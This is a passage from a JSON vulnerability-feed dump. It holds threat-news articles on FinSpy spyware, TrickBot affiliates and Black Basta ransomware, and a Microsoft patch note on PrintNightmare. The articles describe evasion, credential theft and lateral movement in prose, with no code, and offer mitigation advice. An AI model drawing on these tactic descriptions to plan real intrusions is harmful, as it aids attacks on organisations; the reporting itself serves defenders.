asset inventory in a dynamic environment is really hard to do. Threat actors figured that out a long time ago and work around the clock to exploit it. The first step to combating threats like this one is to establish a continuously updated, accurate inventory of all enterprise assets to serve as a foundational control for your security program.\u201d\n\n_**Rule #1 of Linux Security: **No cybersecurity solution is viable if you don\u2019t have the basics down. [**JOIN**](<https://threatpost.com/webinars/4-golden-rules-linux-security/?utm_source=ART&utm_medium=ART&utm_campaign=September_Uptycs_Webinar>) Threatpost and Linux security pros at Uptycs for a LIVE roundtable on the [**4 Golden Rules of Linux Security**](<https://threatpost.com/webinars/4-golden-rules-linux-security/?utm_source=ART&utm_medium=ART&utm_campaign=September_Uptycs_Webinar>). Your top takeaway will be a Linux roadmap to getting the basics right! [**REGISTER NOW**](<https://threatpost.com/webinars/4-golden-rules-linux-security/?utm_source=ART&utm_medium=ART&utm_campaign=September_Uptycs_Webinar>) and join the **LIVE event on Sept. 29 at Noon EST**. Joining Threatpost is Uptycs\u2019 Ben Montour and Rishi Kant who will spell out Linux security best practices and take your most pressing questions in real time._\n", "cvss3": {}, "published": "2021-09-28T15:06:20", "type": "threatpost", "title": "Working PoC Is Out for VMware vCenter CVE-2021-22005 Flaw", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-22005"], "modified": "2021-09-28T15:06:20", "id": "THREATPOST:5E0AFAA7B317D1BA456F06AE1A56D0A3", "href": "https://threatpost.com/working-exploit-vmware-vcenter-cve-2021-22005/175059/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-28T22:44:05", "description": "The FinSpy surveillance kit has been driven from its hiding place following an eight-month investigation by Kaspersky researchers. Detections of the spyware trojan have dwindled since 2018, but it turns out that it hasn\u2019t gone away \u2013 it\u2019s simply been hiding behind various first-stage implants that have helped to cloak its activities. At the same time, it\u2019s continued to advance its capabilities.\n\nFinSpy (aka FinFisher or Wingbird) is a multiplatform software for Windows, macOS and Linux that\u2019s marketed as a tool for law enforcement. However, much like [NSO Group\u2019s Pegasus](<https://threatpost.com/pegasus-spyware-uses-iphone-zero-click-imessage-zero-day/168899/>), it\u2019s often seen [being used for far more malicious purposes](<https://threatpost.com/finspy-modules-secure-messaging-apps/146372/>). First discovered in 2011, it\u2019s a full-service spyware, capable of stealing information and credentials as well as keeping tabs on user activities. For instance, it gathers file listings and deleted files, as well as various documents; can livestream or record data via webcam and microphone; can snoop on messaging chats; and it uses the developers\u2019 mode in browsers to intercept traffic protected with an HTTPS protocol. [](<https://threatpost.com/infosec-insider-subscription-page/?utm_source=ART&utm_medium=ART&utm_campaign=InfosecInsiders_Newsletter_Promo/>)\n\nIn the middle of 2019, several suspicious installers for legitimate applications such as TeamViewer, VLC Media Player and WinRAR were found to contain malicious code. However, they didn\u2019t seem connected to any known malware, according to Kaspersky. But one day researchers stumbled across a Burmese-language website that hosted both the trojanized installers as well as samples of FinSpy for Android.\n\n\u201cWe began detecting some suspicious installers of legitimate applications, backdoored with a relatively small, obfuscated downloader,\u201d according to Kaspersky researchers Igor Kuznetsov and Georgy Kucherin, presenting at a retro-themed and virtual Security Analyst Summit (SAS) 2021 on Tuesday. \u201cOver the course of our investigation, we found out that the backdoored installers are nothing more than first-stage implants that are used to download and deploy further payloads before the actual FinSpy trojan.\u201d\n\n## **Multiple Evasion Techniques**\n\nThe new samples are protected with multiple layers of evasion tactics. For one, after a victim downloads and executes a trojanized application, they\u2019re vetted by two components, according to the analysis. The first is a \u201cpre-validator\u201d that runs multiple security checks to ensure that the device it is infecting does not belong to a security researcher.\n\nThe pre-validator downloads a host of security shellcodes from the command-and-control (C2) server and executes them \u2013 33 of them in all. Each shellcode collects specific system information (e.g., the current process name) and uploads it back to the server, researchers noted. If any of the checks fail, the command-and-control (C2) server terminates the infection process.\n\n\n\nKaspersky researchers Georgy Kucherin and Igor Kuznetsov and, presenting at the virtual Security Analyst Summit (SAS) 2021.\n\nIf all security checks pass, the server provides a second component, dubbed the \u201cpost-validator.\u201d It collects information that allows it to identify the victim machine and perhaps validate a specific target (it logs running processes, recently opened documents and screenshots) and sends it to a C2 server specified in its configuration.\n\nBased on the information collected, the C2 server decides whether to deploy the full-fledged trojan platform or remove the infection, according to Kaspersky.\n\nIf FinSpy is finally deployed, it arrives heavily obfuscated with four complex, custom-made obfuscators, according to Kaspersky\u2019s analysis.\n\n\u201cThe primary function of this obfuscation is to slow down the analysis of the spyware,\u201d the researchers explained.\n\nAnother evasion tactic involves a sample of FinSpy that infects machines by replacing the Windows UEFI bootloader, which is responsible for launching the operating system.\n\n\u201cThis method of infection allowed the attackers to install a bootkit without the need to bypass firmware security checks,\u201d according to [the research](<https://securelist.com/finspy-unseen-findings/104322/>). \u201cUEFI infections are very rare and generally hard to execute, they stand out due to their evasiveness and persistence. While in this case the attackers did not infect the UEFI firmware itself, but its next boot stage, the attack was particularly stealthy, as the malicious module was installed on a separate partition and could control the boot process of the infected machine.\u201d\n\nThe amount of work put into making FinSpy inaccessible to security researchers is particularly worrying, if impressive, said Kuznetsov. \u201cIt seems like the developers put at least as much work into obfuscation and anti-analysis measures as in the trojan itself,\u201d he noted. \u201cThe fact that this spyware is deployed with high precision and is practically impossible to analyze also means that its victims are especially vulnerable, and researchers face a special challenge \u2013 having to invest an overwhelming amount of resources into untangling each and every sample.\u201d\n\n## **Highly Modular FinSpy**\n\nKaspersky also looked into the capabilities of the latest samples to see if there have been advancements and found that FinSpy\u2019s architecture remains highly modular, but more difficult to analyze than ever. That\u2019s because a component called \u201cthe hider\u201d encrypts all of them.\n\n\u201cIt encrypts all of the memory pages, belonging to the whole infrastructure, including the orchestrator and all of the plugins, and all the memory pages will just stay encrypted until they are needed,\u201d explained Kuznetsov. \u201cThe moment the code has to be executed or data has to be accessed, that one page is decrypted. Then when it is no longer needed, it\u2019s just encrypted back.\u201d\n\nHe added, \u201cThis means that if you even make a live memory image of an infected machine it will be very hard to find the trojan in memory, because the only unencrypted thing that you will see, will be a tiny part of this hider.\u201d\n\n\n\nSource: Kaspersky.\n\nThe hider is also responsible for starting \u201cthe orchestrator,\u201d which is a core module that will load the rest of the functionality and control the plugins, according to the analysis. It remains more or less the same as it was in previous samples, Kuznetsov said, but it adds a new module called \u201cthe communicator,\u201d which is a hard-coded binary within a resource section of the orchestrator used to maintain C2 communication.\n\nAnother new module is a process worm.\n\n\u201cThis doesn\u2019t infect or propagate between the machines. Instead, it propagates within the machine, starting from the top process where the whole architecture started (usually explorer.exe or Winlogon.exe),\u201d explained Kuznetsov. \u201cIt will make copies of itself in all the child processes, and all these child processes infected will maintain communication with the parent process.\u201d\n\nThis worm module also hooks the keyboard, mouse clicks and various APIs to FinSpy\u2019s various plugins, for data-collection purposes.\n\n\n\nSource: Kaspersky.\n\n\u201cThe plugins themselves are used mostly to collect information about the victim,\u201d he said. \u201cThere are not many plugins devoted to other tasks. We haven\u2019t found any plugins devoted to lateral movement for example, though there is one curious plugin that is devoted to infecting BlackBerry devices.\u201d\n\nThere are individual plugins for stealing credentials for VPNs, dial-up credentials, Microsoft product key information, browser search and browsing history, information about Wi-Fi connections, file listings, and more. There\u2019s also a generic plugin for recording audio from any voice over IP (VoIP) software.\n\n\u201cWhat is also interesting is that there are forensic tools for uncovering information about deleted files and storing that deleted-file history,\u201d Kuznetsov said. \u201cThere is also quite a unique plugin that exploits the debug function of modern browsers. By setting a particular environment variable, they make the browsers dump all the SSL encryption keys on disk. And by doing this, the attackers can decrypt all the SSL traffic from the victim.\u201d\n\nAll of the information can be collected in real time and can be live-streamed to the attackers or pre-recorded. Data collection can be triggered by launching an application of interest as well, the researcher noted.\n\nOne thing is clear: FinSpy remains under active development, and its authors have put a herculean effort into avoiding analysis.\n\n\u201cWe spent about eight months full time, with several researchers,\u201d Kuznetsov said. \u201cDuring that time we really had to upgrade all our tooling. We had to invent and make some tools from scratch, all of which led to producing a 300-page report on this. And what is the conclusion here? We think that there is no conclusion, because we believe that this story is never-ending. They will keep updating and upgrading their infrastructure, all the time.\u201d\n\n_**Rule #1 of Linux Security: **__No cybersecurity solution is viable if you don\u2019t have the basics down. _[**_JOIN_**](<https://threatpost.com/webinars/4-golden-rules-linux-security/?utm_source=ART&utm_medium=ART&utm_campaign=September_Uptycs_Webinar>)_ Threatpost and Linux security pros at Uptycs for a LIVE roundtable on the _[**_4 Golden Rules of Linux Security_**](<https://threatpost.com/webinars/4-golden-rules-linux-security/?utm_source=ART&utm_medium=ART&utm_campaign=September_Uptycs_Webinar>)_. Your top takeaway will be a Linux roadmap to getting the basics right! _[**_REGISTER NOW_**](<https://threatpost.com/webinars/4-golden-rules-linux-security/?utm_source=ART&utm_medium=ART&utm_campaign=September_Uptycs_Webinar>)_ and join the **LIVE event on Sept. 29 at Noon EST**. Joining Threatpost is Uptycs\u2019 Ben Montour and Rishi Kant who will spell out Linux security best practices and take your most pressing questions in real time._\n", "cvss3": {}, "published": "2021-09-28T17:45:59", "type": "threatpost", "title": "SAS 2021: FinSpy Surveillance Kit Re-Emerges Stronger Than Ever", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-22005"], "modified": "2021-09-28T17:45:59", "id": "THREATPOST:88FF52A5E5D2048EB3D0F046F6D96C9F", "href": "https://threatpost.com/finspy-surveillance-kit/175068/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-15T18:06:14", "description": "The cybercriminals behind the infamous TrickBot trojan have signed two additional distribution affiliates, dubbed Hive0106 (aka TA551) and Hive0107 by IBM X-Force. The result? Escalating ransomware hits on corporations, especially using the Conti ransomware.\n\nThe development also speaks to the TrickBot gang\u2019s increasing sophistication and standing in the cybercrime underground, IBM researchers said: \u201cThis latest development demonstrates the strength of its connections within the cybercriminal ecosystem and its ability to leverage these relationships to expand the number of organizations infected with its malware.\u201d\n\nThe TrickBot malware started life as a banking trojan back in 2016, but it quickly evolved to become a modular, full-service threat. It\u2019s capable of a range of backdoor and data-theft functions, can deliver additional payloads, and has the ability to quickly [move laterally](<https://threatpost.com/trickbot-port-scanning-module/163615/>) throughout an enterprise.\n\nAccording to IBM, the TrickBot gang (aka ITG23 or Wizard Spider) has now added powerful additional distribution tactics to its bag of tricks, thanks to the two new affiliates.\n\n\u201cEarlier this year, [the TrickBot gang] primarily relied on email campaigns delivering Excel documents and a call-center ruse known as BazarCall to deliver its payloads to corporate users,\u201d IBM researchers said in a [Wednesday analysis](<https://securityintelligence.com/posts/trickbot-gang-doubles-down-enterprise-infection/>). \u201cHowever\u2026the new affiliates have added the use of hijacked email threads and fraudulent website customer-inquiry forms. This move not only increased the volume of its delivery attempts but also diversified delivery methods with the goal of infecting more potential victims than ever.\u201d\n\nBazarCall is a [distribution tactic](<https://unit42.paloaltonetworks.com/bazarloader-malware/>) that starts with emails offering \u201ctrial subscriptions\u201d to various services \u2013 with a phone number listed to call customer service to avoid being charged money. If someone calls, a call-center operator answers and directs victims to a website to purportedly unsubscribe from the service: a process the \u201cagent\u201d walks the caller through. In the end, vulnerable computers become infected with malware \u2013 usually the [BazarLoader implant](<https://threatpost.com/bazarloader-malware-slack-basecamp/165455/>), which is another malware in the TrickBot gang\u2019s arsenal, and sometimes TrickBot itself. These types of attacks have continued into the autumn, enhanced by the fresh distribution approaches, according to IBM.\n\nMeanwhile, since 2020, the TrickBot gang has been heavily involved in the ransomware economy, with the TrickBot malware acting as an initial access point in campaigns. Users infected with the trojan will see their device become part of a botnet that attackers typically use to load the second-stage ransomware variant. The operators have developed their own ransomware as well, according to IBM: the Conti code, which is notorious for hitting hospitals, [destroying backup files](<https://threatpost.com/conti-ransomware-backups/175114/>) and pursuing [double-extortion tactics](<https://threatpost.com/double-extortion-ransomware-attacks-spike/154818/>).\n\nIBM noted that since the two affiliates came on board in June, there\u2019s been a corresponding increase in Conti ransomware attacks \u2013 not likely a coincidence.\n\n\u201cRansomware and extortion go hand in hand nowadays,\u201d according to the firm\u2019s analysis. \u201c[The TrickBot gang] has also adapted to the ransomware economy through the creation of the Conti ransomware-as-a-service (RaaS) and the use of its BazarLoader and Trickbot payloads to gain a foothold for ransomware attacks.\u201d\n\n## **Affiliate Hive0106: Spam Powerhouse **\n\nIBM X-Force researchers noted that the most important development since June for the distribution of the TrickBot gang\u2019s various kinds of malware is the newly minted partnership with Hive0106 (aka TA551, Shathak and UNC2420).\n\nHive0106 specializes in massive volumes of spamming and is a financially motivated threat group that\u2019s lately been looking to partner with elite cybercrime gangs, the firm said.\n\nHive0106 campaigns begin with hijacking email threads: a tactic pioneered by its frenemy [Emotet](<https://threatpost.com/emotet-takedown-infrastructure-netwalker-offline/163389/>). The tactic involves [jumping into ongoing correspondence](<https://unit42.paloaltonetworks.com/emotet-thread-hijacking/>) to respond to an incoming message under the guise of being the rightful account holder. These existing email threads are stolen from email clients during prior infections. Hive0106 is able to mount these campaigns at scale, researchers said, using newly created malicious domains to host malware payloads.\n\n\u201cThe emails include the email thread subject line but not the entire thread,\u201d according to IBM X-Force\u2019s writeup. \u201cWithin the email is an archive file containing a malicious attachment and password.\u201d\n\nIn the new campaigns, that malicious document drops an HTML application (HTA) file when macros are enabled.\n\n\u201cHTA files contain hypertext code and may also contain VBScript or JScript scripts, both of which are often used in boobytrapped macros,\u201d according to the analysis. \u201cThe HTA file then downloads Trickbot or BazarLoader, which has subsequently been observed downloading Cobalt Strike.\u201d\n\nCobalt Strike is the legitimate pen-testing tool that\u2019s [often abused by cybercriminals](<https://threatpost.com/cobalt-strike-cybercrooks/167368/>) to help with lateral movement. It\u2019s often a precursor to a ransomware infection.\n\n## **Hive0107 Comes on Board**\n\nAnother prominent affiliate that hooked its wagon up to the TrickBot gang this summer is Hive0107, which spent the first half of the year distributing the IcedID trojan (a [TrickBot rival](<https://threatpost.com/icedid-banking-trojan-surges-emotet/165314/>)). It switched horses to TrickBot in May, using its patented contact form distribution method.\n\nAnalysts \u201cobserved Hive0107 with occasional distribution campaigns of the Trickbot malware detected mid-May through mid-July 2021\u2026after that period, Hive0107 switched entirely to delivering BazarLoader,\u201d according to the researchers, who added that most of the campaigns target organizations in the U.S. and, to a lesser extent, Canada and Europe.\n\nHive0107 is well-known for using customer contact forms on company websites to send malicious links to unwitting employees. Usually, the messages it sends threaten legal action, according to the analysis.\n\nPreviously, the cybercriminals used copyright infringement as a ruse: \u201cThe group typically enters information into these contact forms \u2014 probably using automated methods \u2014 informing the targeted organization that it has illegally used copyrighted images and includes a link to their evidence,\u201d IBM X-Force researchers explained.\n\nIn the new campaigns, Hive0107 is using a different lure, the researchers said, claiming that the targeted company has been performing distributed denial-of-service (DDoS) attacks on its servers. Then, the messages provide a (malicious) link to purported evidence and how to remedy the situation.\n\nThe group also sends the same content via email to organization staff \u2013 an additional switch-up in tactics.\n\nIn any event, the links are hosted on legitimate cloud storage services where the payload lives, according to the analysis.\n\n\u201cClicking on the link downloads a .ZIP archive containing a malicious JScript (JS) downloader titled \u2018Stolen Images Evidence.js\u2019 or \u2018DDoS attack proof and instructions on how to fix it.js,'\u201d researchers explained. \u201cThe JS file contacts a URL on newly created domains to download BazarLoader.\u201d\n\nBazarLoader then goes on to download Cobalt Strike and a PowerShell script to exploit the [PrintNightmare vulnerability](<https://threatpost.com/microsoft-unpatched-printnightmare-zero-day/168613/>) (CVE-2021-34527), they added \u2013 and sometimes TrickBot.\n\n\u201cIBM suspects that access achieved through these Hive0107 campaigns is ultimately used to initiate a ransomware attack,\u201d the researchers noted.\n\nThe new affiliate campaigns are evidence of the TrickBot gang\u2019s continuing success breaking into the circle of the cybercriminal elite, the firm concluded \u2013 a trend IBM X-Force expects to continue into next year.\n\n\u201c[The gang] started out aggressively back in 2016 and has become a cybercrime staple in the Eastern European threat-actor arena,\u201d researchers said. \u201cIn 2021, the group has repositioned itself among the top of the cybercriminal industry.\u201d\n\nThey added, \u201cThe group already has demonstrated its ability to maintain and update its malware and infrastructure, despite the efforts of law enforcement and industry groups [to take it down](<https://threatpost.com/authorities-arrest-trickbot-member/169236/>).\u201d\n\n## **How to Protect Companies When TrickBot Hits**\n\nTo reduce the chances of suffering catastrophic damage from an infection (or a follow-on ransomware attack), IBM recommends taking the following steps:\n\n * **Ensure you have backup redundancy**, stored separately from network zones attackers could access with read-only access. The availability of effective backups is a significant differentiator for organizations and can support recovery from a ransomware attack.\n * **Implement a strategy to prevent unauthorized data theft**, especially as it applies to uploading large amounts of data to legitimate cloud storage platforms that attackers can abuse.\n * **Employ user-behavior analytics** to identify potential security incidents. When triggered, assume a breach has taken place. Audit, monitor and quickly act on suspected abuse related to privileged accounts and groups.\n * **Employ multi-factor authentication** on all remote access points into an enterprise network.\n * **Secure or disable remote desktop protocol (RDP).** Multiple ransomware attacks have been known to exploit weak RDP access to gain initial entry into a network.\n\n_**Check out our free **_[_**upcoming live and on-demand online town halls **_](<https://threatpost.com/category/webinars/>)_**\u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-15T18:05:29", "type": "threatpost", "title": "TrickBot Gang Enters Cybercrime Elite with Fresh Affiliates", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2021-10-15T18:05:29", "id": "THREATPOST:827A7E3B49365A0E49A11A05A5A29192", "href": "https://threatpost.com/trickbot-cybercrime-elite-affiliates/175510/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "pentestpartners": [{"lastseen": "2023-08-06T19:44:28", "description": "\n\n### What is Black Basta ransomware?\n\nBlack Basta is a threat group that provides ransomware-as-a-service (RaaS). \n\nThe service is maintained by dedicated developers and is a highly efficient and professionally run operation; there's a TOR website that provides a victim login portal, a chat room, and a wall of company\u2019s names who\u2019s data has been leaked. \n\nThe group first surfaced in 2022, with intel suggesting that the group was buying up stolen credentials on various dark markets. Reports of attacks came soon after. They\u2019re currently in second place, trailing only Lockbit in ransomware attacks globally, targeting a wide array of industries notably in Europe and the US. \n\nVictim chat / login portal:\n\n\n\nNews board (obfuscated) publishing data leaks:\n\n\n\nIn addition to the usual year on year double-digit percentage increase in ransomware attacks, BlackBasta has had a huge uptick in attacks since October 2022 landing some high profile victims such as [Marshall Amplification](<https://thecyberexpress.com/marshall-hacked-black-basta-ransomware-group/>) and [Capita IT](<https://www.theregister.com/2023/04/18/capita_breach_gets_worse/>).\n\nThey are also infamous for their double-extortion methods, stealing data as well as encrypting it. This piles on the pressure for victims and provides another avenue in selling on the ill gotten information.\n\nThey\u2019re believed to be a geographically Russian based group, and based on attack pattern analysis and observed tactics; they\u2019re also likely an offshoot, or related to the Conti ransomware family. \n\nThe well-organised nature and high volume of attacks, combined with a distinct lack of affiliate recruitment on the usual DarkNet sites has given rise to the speculation that the group is state-sponsored.\n\n### Slick professionals\n\nWhat takes a lot of people by surprise is the slick professionalism of these threat actors. They are labelled ransomware 'gangs' but that downplays how they operate. Black Basta is no different.\n\nSwap the shady dark web site for a service desk and support portal, seized and stolen PII data for business deals in the hundreds of thousands of dollars, and the idea of a lone nerdy hacker in their bedroom for a hierarchical, structured company with various departments, promotion opportunities, and 3rd party outsourcing.\n\nChat logs for Black Basta now in the public domain show:\n\n * Technical assistance being offered\n * Cryptocurrency tutorials\n * Friendly interactions with clients\n\nThere are even promises of forensic reports, detailing the vulnerabilities that have been used to gain access in the first instance.\n\nThese levels of service should act as a stark reminder of the sophistication involved.\n\n### How are they targeting victims?\n\nThis isn\u2019t a spray and pray approach. Companies are selected and targeted. \n\nSpear phishing emails are sent to valid accounts containing malicious payloads - most commonly Microsoft OneNote (.one) as attachments, but has also been seen using other Microsoft document file formats. Opening these files will often show a \u201cCLICK HERE TO VIEW IN OFFICE 365\u201d image (an attempt to confuse potential victims)..\n\n\n\nLurking under the image is a file that will reach out to a malicious URL and download further malware \n\n\n\n### What do they do once they\u2019re inside?\n\nBlack Basta uses PowerShell scripts to gather as much information as possible about the system or network it has landed on, it will pivot around and execute further executables using PSExec, RDP and / or WMI. It will also attempt to disable antivirus, use Mimikatz to further harvest credentials.\n\nThe critical flaw in Windows that is allowing the widespread and damaging attacks to take place is through vulnerabilities CVE-2021-1675 and CVE-2021-34527, or the \u201cPrintNightmare\u201d exploit. This occurs in the print spooler service, leading to privilege escalation and / or remote code execution. Black Basta harness this to deploy the Cobalt Strike beacon that allows a persistence mechanism and the ability to deploy further payloads. \n\nInevitably the end goal is encryption and exfiltration of data (through rclone, interestingly), and a cursory sweep of volume shadow copy deletion to inhibit recover even further. \n\nDesktops are defaced with the group\u2019s branding, and text documents are scattered in affected directories with instructions on what they want you to do next.\n\nRecently a Linux variant of the malware was spotted in the wild, targeting EXSi hosts. This is not just for Windows environments! And as you can imagine, hitting a core Hypervisor can be absolutely devastating to an organisation.\n\n### Tactics, Techniques, and Procedures (TTPs)\n\n\n\n### What can be done to mitigate?\n\nThe key point of infiltration here is user interaction. The use of OneNote files has caught people unawares. Combining that with references to Office 365, broadly named files and legitimate looking usernames can provide the right mix of confidence and mis-understanding to proceed.\n\nCyber Awareness training including educating colleagues to never open attachments without a complete understanding of what they pertain to, giving extra attention to external senders. \nIn addition, preventing such emails from ever reaching their destination is even more effective. Is it usual for third parties to email unexpected and unrequested files? If not, don\u2019t let them in.\n\nBlackBasta leverages WMI, PowerShell and the Remote Desktop Protocol. Prevent these from being executed on non-critical network endpoints and the ability to pivot around the network or even perform reconnaissance is severely hindered. \n\nPatch patch patch! We have seen that Black Basta leverages the PrintNightmare exploits to gain a foothold on a victim network. It only takes a second to pivot to another methodology, so ensuring all operating system and applications (especially antivirus) are kept completely up to date. \n\nRansomware encryption can be mitigated with isolated and up-to-date backups which can be restored once the network is safe. Data theft is much harder to row back from. Consider implementing Intrusion Detection systems (IDS) or upgrade to Next-generation Firewalls (NGFW). These platforms will monitor traffic at a deeper level and in real time to detect and prevent the egress of unauthorised data from emerging threats.\n\n### Help. I\u2019ve already been infected with Black Basta\n\nImmediately disconnect the infected computers or laptops from all network connections.\n\nIn a very serious case where the ransomware has already taken hold on multiple hosts, consider whether turning off your Wi-Fi, disabling any core network connections (including switches), and disconnecting from the internet might be necessary. An ideal move here is to block all internet traffic, allowing key services through one-by-one. But the ability to do this can depend on your business and your systems administration setup.\n\nReset credentials including passwords (especially for administrator and other system accounts) - but verify that you are not locking yourself out of systems that are needed for recovery.\n\nMonitor network traffic and run antivirus scans globally to see where else has been hit. Any log preservation is crucial at this point, so be sure to retain them as quickly as possible in a safe location.\n\nThe post [Black Basta ransomware](<https://www.pentestpartners.com/security-blog/black-basta-ransomware/>) first appeared on [Pen Test Partners](<https://www.pentestpartners.com>).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-06-28T05:11:34", "type": "pentestpartners", "title": "Black Basta ransomware", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2023-06-28T05:11:34", "id": "PENTESTPARTNERS:6636EE51C46282492E9A91509CBA5C4B", "href": "https://www.pentestpartners.com/security-blog/black-basta-ransomware/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "mskb": [{"lastseen": "2023-11-28T09:54:39", "description": "None\n**EXPIRATION NOTICE****IMPORTAN**T As of 9/12/2023, this KB is only available from Windows Update. It is no longer available from the Microsoft Update Catalog or other release channels. We recommend that you update your devices to the latest security quality update. \n\n**6/21/21 \nIMPORTANT **This release includes the Flash Removal Package. Taking this update will remove Adobe Flash from the machine. For more information, see the [Update on Adobe Flash Player End of Support](<https://blogs.windows.com/msedgedev/2020/09/04/update-adobe-flash-end-support/>).\n\n**11/17/20**For information about Windows update terminology, see the article about the [types of Windows updates](<https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/standard-terminology-software-updates>) and the [monthly quality update types](<https://techcommunity.microsoft.com/t5/windows-it-pro-blog/windows-quality-updates-primer/ba-p/2569385>). To view other notes and messages, see the Windows 10, version 2004 update history [home page](<https://support.microsoft.com/en-us/help/4555932>). \n**Note **Follow [@WindowsUpdate](<https://twitter.com/windowsupdate>) to find out when new content is published to the release information dashboard.\n\n## Highlights\n\n * Updates a remote code execution exploit in the Windows Print Spooler service, known as \u201cPrintNightmare\u201d, as documented in [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>).\n\n## Improvements and fixes\n\n**Note: **To view the list of addressed issues, click or tap the OS name to expand the collapsible section.\n\n### \n\n__\n\nWindows 10 servicing stack update - 19041.1081, 19042.1081, and 19043.1081\n\n * This update makes quality improvements to the servicing stack, which is the component that installs Windows updates. Servicing stack updates (SSU) ensure that you have a robust and reliable servicing stack so that your devices can receive and install Microsoft updates.\n\n### \n\n__\n\nWindows 10, version 21H1\n\nThis security update includes quality improvements. Key changes include:\n\n * This build includes all the improvements from Windows 10, version 2004.\n * No additional issues were documented for this release.\n\n### \n\n__\n\nWindows 10, version 20H2\n\nThis security update includes quality improvements. Key changes include:\n\n * This build includes all the improvements from Windows 10, version 2004.\n * No additional issues were documented for this release.\n\n### \n\n__\n\nWindows 10, version 2004\n\nThis security update includes quality improvements. Key changes include:\n\n * Addresses a remote code execution exploit in the Windows Print Spooler service, known as \u201cPrintNightmare\u201d, as documented in [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>). After installing this and later Windows updates, users who are not administrators can only install signed print drivers to a print server. By default, administrators can install signed and unsigned printer drivers to a print server. The installed root certificates in the system\u2019s Trusted Root Certification Authorities trusts signed drivers. Microsoft recommends that you immediately install this update on all supported Windows client and server operating system, starting with devices that currently host the print server role. You also have the option to configure the **RestrictDriverInstallationToAdministrators** registry setting to prevent non-administrators from installing signed printer drivers on a print server. For more information, see KB5005010.\nIf you installed earlier updates, only the new fixes contained in this package will be downloaded and installed on your device.\n\n**Windows Update Improvements** \n \nMicrosoft has released an update directly to the Windows Update client to improve reliability. Any device running Windows 10 configured to receive updates automatically from Windows Update, including Enterprise and Pro editions, will be offered the latest Windows 10 feature update based on device compatibility and Windows Update for Business deferral policy. This doesn't apply to long-term servicing editions.\n\n## Known issues in this update\n\n### \n\n__\n\nClick or tap to view the known issues\n\n**Symptoms**| **Workaround** \n---|--- \nWhen using the Microsoft Japanese Input Method Editor (IME) to enter Kanji characters in an app that automatically allows the input of Furigana characters, you might not get the correct Furigana characters. You might need to enter the Furigana characters manually.**Note **The affected apps are using the **ImmGetCompositionString()** function.| This issue is resolved in KB5005101. \nDevices with Windows installations created from custom offline media or custom ISO image might have [Microsoft Edge Legacy](<https://support.microsoft.com/en-us/microsoft-edge/what-is-microsoft-edge-legacy-3e779e55-4c55-08e6-ecc8-2333768c0fb0>) removed by this update, but not automatically replaced by the new Microsoft Edge. This issue is only encountered when custom offline media or ISO images are created by slipstreaming this update into the image without having first installed the standalone servicing stack update (SSU) released March 29, 2021 or later.**Note **Devices that connect directly to Windows Update to receive updates are not affected. This includes devices using Windows Update for Business. Any device connecting to Windows Update should always receive the latest versions of the SSU and latest cumulative update (LCU) without any extra steps.| To avoid this issue, be sure to first slipstream the SSU released March 29, 2021 or later into the custom offline media or ISO image before slipstreaming the LCU. To do this with the combined SSU and LCU packages now used for Windows 10, version 20H2 and Windows 10, version 2004, you will need to extract the SSU from the combined package. Use the following steps to extract the SSU:\n\n 1. Extract the cab from the msu via this command line (using the package for KB5000842 as an example): **expand Windows10.0-KB5000842-x64.msu /f:Windows10.0-KB5000842-x64.cab <destination path>**\n 2. Extract the SSU from the previously extracted cab via this command line: **expand Windows10.0-KB5000842-x64.cab /f:* <destination path>**\n 3. You will then have the SSU cab, in this example named **SSU-19041.903-x64.cab**. Slipstream this file into your offline image first, then the LCU.\nIf you have already encountered this issue by installing the OS using affected custom media, you can mitigate it by directly installing the [new Microsoft Edge](<https://www.microsoft.com/edge>). If you need to 